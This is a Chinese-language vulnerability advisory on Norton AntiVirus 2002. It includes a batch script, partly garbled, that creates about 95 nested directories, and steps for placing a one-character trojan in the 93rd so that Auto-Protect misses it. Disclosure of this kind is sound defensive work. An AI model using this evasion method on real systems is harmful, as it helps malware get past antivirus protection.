Norton AntiVirus 2002在处理嵌套文件时存在问题，远程或者本地攻击者可以利用这个漏洞绕过NORTON的自动保护而执行恶意程序。

c:\盘下在95个子目录中包含'--------------------------------------------------------
--------'文件夹名，并运行如下脚本：

=-------CUT----------=
@echo off
echo ( you can use, http://www.eicar.org/anti_virus_test_file.htm)
echo for a harmless test...
pause
cdc:
cd:hUNT3r
md 1
cd 1
if not errorlevel 1 goto :hUNT3r
:rename
cdc:
cdren 1 ----------------------------------------------------------------
explorer c:
exit

=-------CUT----------=

然后把名为1.exe的木马程序放到第93个子目录中并执行，NAV自动保护功能将不起作用，导致恶意程序执行。注木马程序必须以1字符文件名并从第93个子目录中执行。

受影响系统：
Symantec Norton AntiVirus 2002
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional

攻击方法：
参考“详述”一栏

解决方案：
厂商目前还没有提供安全补丁，建议随时关注厂商主页以获取最新版本：